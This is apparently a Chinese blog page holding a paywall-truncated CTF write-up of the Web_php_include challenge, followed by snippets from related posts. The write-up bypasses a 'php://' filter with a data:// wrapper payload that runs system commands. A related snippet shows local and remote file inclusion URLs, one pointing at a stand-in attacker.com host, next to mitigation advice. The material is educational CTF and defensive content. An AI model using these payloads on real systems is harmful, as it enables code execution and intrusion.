攻防世界-Web题目2(弱比较、php伪协议)

最新推荐文章于 2025-11-08 19:52:13 发布
原创 最新推荐文章于 2025-11-08 19:52:13 发布 · 793 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

目录

Web_php_include

1、题目

2、知识点

3、思路

simple_php

4、题目

5、知识点

6、思路

Web_php_include

1、题目

2、知识点

php伪协议

3、思路

审计源代码

需要我们上传一个page参数,但是对参数内容进行过滤,

$page=str_replace("php://", "", $page);  意思是将php://替换成空,

看到这个,联想到使用php伪协议,既然这个协议被过滤,那就用其他协议

使用data://协议,

data://text/plain,<?php phpinfo();?>

payload:

/?page=data://text/plain,<?php%20system("ls");?>

?page=data://text/plain,<?php%20sys

最低0.47元/天 解锁文章
ctf(2)-攻防世界web高手进阶区
weixin_46938584的博客
12-06 2045
baby_web web请求头中的location作用 步骤 1.根据提示,在url中输入index.php,发现打开的仍然还是1.php 2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag。 Training-WWW-Robots 过于简单,略 ...
攻防世界-Web题目1(ThinkPHP V5框架漏洞、php伪协议
weixin_54055099的博客
07-18 891
ThinkPHP V5的框架漏洞、php伪协议
Web_php_include(strstr与str_replace函数)
sGanYu
08-24 1346
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);#查找php://,null替换查找的值,并且规定搜索$page } include($page); ?> strstr函数 strstr(str1,str2) 函数,判断字符串str2是否是s...
攻防世界——文件包含与伪协议
yanfangjie的博客
01-17 833
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析这段代码的意思 strstr(page,"php://"):匹配PHP://在page,"php://"):匹配PHP:/
Web_php_include-攻防世界
szhangliwenya的博客
03-25 2466
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
攻防世界-Web_php_include详解
热门推荐
Mr_helloword的博客
08-11 1万+
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
攻防世界---web---Web_php_unserialize
2201_75556700的博客
06-02 1662
表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。:最后,将修改后的序列化字符串进行Base64编码,然后输出。类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量。这样的正则表达式检查。原始的序列化字符串中,6、在源代码中我们需要绕过几个函数。7、运行代码可以看到序列后的结果。4、根据代码中的提示,我们将。的类,该类有一个私有属性。通过将序列化字符串中的。:这行代码的目的是绕过。:这行代码的目的是绕过。
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1485
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界-web进阶)FlatScience–WP
12-14
在这个“攻防世界-web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界web进阶区——Web_php_include
一枚菜鸡
10-18 649
一、基本方法:大小写绕过 考察的是文件包含,page中带有php://的都会被替换成空,str_replace()以其他字符替换字符串中的一些字符(区分大小写),strstr() 查找字符串首次出现的位置。返回字符串剩余部分。 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", ""
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4770
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
php查询替换_PHP 字符串替换 substr_replace 与 str_replace 函数
weixin_39753791的博客
03-08 240
PHP 字符串替换用于从字符串中替换指定字符串。相关函数如下:substr_replace():把字符串的一部分替换为另一个字符串str_replace():使用一个字符串替换字符串中的另一些字符substr_replace() 函数用于把字符串的一部分替换为另一个字符串,返回混合类型。语法:mix substr_replace ( mixed string, string replacement...
修正Thinkphp 3.2.3 分页Page类以支持URL路由
曹品东
06-13 1891
路由配置: '/^x_(\d+)_p_(\d+)$/' =&gt; 'Home/Xinwen/index?id=:1&amp;p=:2',//分页修正Library\Think\Page.class.php分类以支持路由//在23行,修改访问修饰符private为public public $url=''; //在70行,防止经过传参后会出现问题urlencode('[PAGE]')转为小写,...
php数据替换处理str_replace()函数
lovetina2017的博客
06-23 2350
空格处理<?php $a ='汉兰达 红杉 普瑞维亚 凯美瑞 雅力士 花冠 卡罗拉 威驰 兰德酷路泽 普拉多 杰路驰 埃尔法 丰田4Runner 赛利卡 丰田Aygo FJ酷路泽 丰田HIACE 光冠 锐志 丰田MR2 普锐斯 丰田Sienna 塔库玛 坦途 逸致 小霸王 亚洲龙 皇冠'; //$str = preg_replace('//s*/', ',', $a); $str = str_re
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1141
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
php中strstr和stristr的区别及用法
zx980414k的博客
03-24 733
strstr和stristr都是匹配字符串用的,但是strstr是区分大小写的,stristr是不区分大小写的。 所以例如: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这段php代码,当page参数中有
如何使用 Docker Compose 安装 WordPress
最新发布
weixin_53510183的博客
11-08 789
本文介绍了如何使用Docker和Docker Compose快速搭建一个安全的多容器WordPress网站,包含Nginx、MySQL和WordPress组件,并通过Let's Encrypt获取TLS/SSL证书。教程详细说明了Nginx服务器配置文件的编写方法,包括服务器监听设置、域名绑定、PHP处理规则等关键配置项。同时提供了搭建前的准备工作,包括需要注册的域名、DNS记录设置以及服务器环境要求。通过容器化部署方式,可以简化传统LAMP/LEMP堆栈的复杂安装过程,实现快速部署和安全证书自动更新。适合
CTFHub Web进阶-PHP:Bypass_disable_function通关6之Json Serializer UAF
mooyuan的网络安全博客
11-07 1497
本文详细讲解CTFHub的Web进阶中disable-functions的Json Serializer UAF关卡的渗透全流程,展示利用PHP JSON序列化组件Bug#77843绕过disable_functions限制的渗透方法。通过蚁剑工具连接靶场后,使用disablefunction插件中的JsonSerializerUAF模式成功执行命令获取flag。该风险源于PHP 7.3.3版本中json_encode处理JsonSerializable接口时的引用计数错误,导致释放后使用(UAF)
攻防世界-web-file_include的答案
12-06
攻防世界(CTF)比赛中,Web题目中的文件包含(File Inclusion)漏洞是一种常见的考点。文件包含漏洞通常出现在PHP等脚本语言中,攻击者可以通过构造特定的URL参数来包含服务器上的任意文件,从而获取敏感信息或执行恶意代码。 以下是一些常见的文件包含漏洞及其解决方法: ### 1. 本地文件包含(LFI) 本地文件包含漏洞允许攻击者包含服务器上的本地文件。例如: ```php <?php include($_GET['file']); ?> ``` 攻击者可以通过构造如下URL来包含服务器的敏感文件: ``` http://example.com/vuln.php?file=/etc/passwd ``` ### 2. 远程文件包含(RFI) 远程文件包含漏洞允许攻击者包含远程服务器上的文件。例如: ```php <?php include($_GET['file']); ?> ``` 攻击者可以通过构造如下URL来包含远程服务器上的恶意文件: ``` http://example.com/vuln.php?file=http://attacker.com/malicious.php ``` ### 解决方法 1. **白名单验证**:只允许包含特定的目录或文件。例如: ```php <?php $allowed_files = ['index.php', 'contact.php', 'about.php']; if (in_array($_GET['file'], $allowed_files)) { include($_GET['file']); } else { echo "File not allowed"; } ?> ``` 2. **路径限制**:限制包含文件的路径,避免目录遍历攻击。例如: ```php <?php $file = $_GET['file']; $file = str_replace('../', '', $file); include($file); ?> ``` 3. **禁用远程包含**:在php.ini配置文件中禁用远程文件包含: ``` allow_url_include = Off ``` 4. **使用绝对路径**:包含文件时使用绝对路径,避免相对路径的目录遍历攻击。例如: ```php <?php include('/var/www/html/includes/' . $_GET['file']); ?> ``` ### 总结 文件包含漏洞是一种严重的安全隐患,攻击者可以通过包含任意文件来获取敏感信息或执行恶意代码。开发者应采取有效的防护措施,如白名单验证、路径限制、禁用远程包含等,以防止此类漏洞的发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值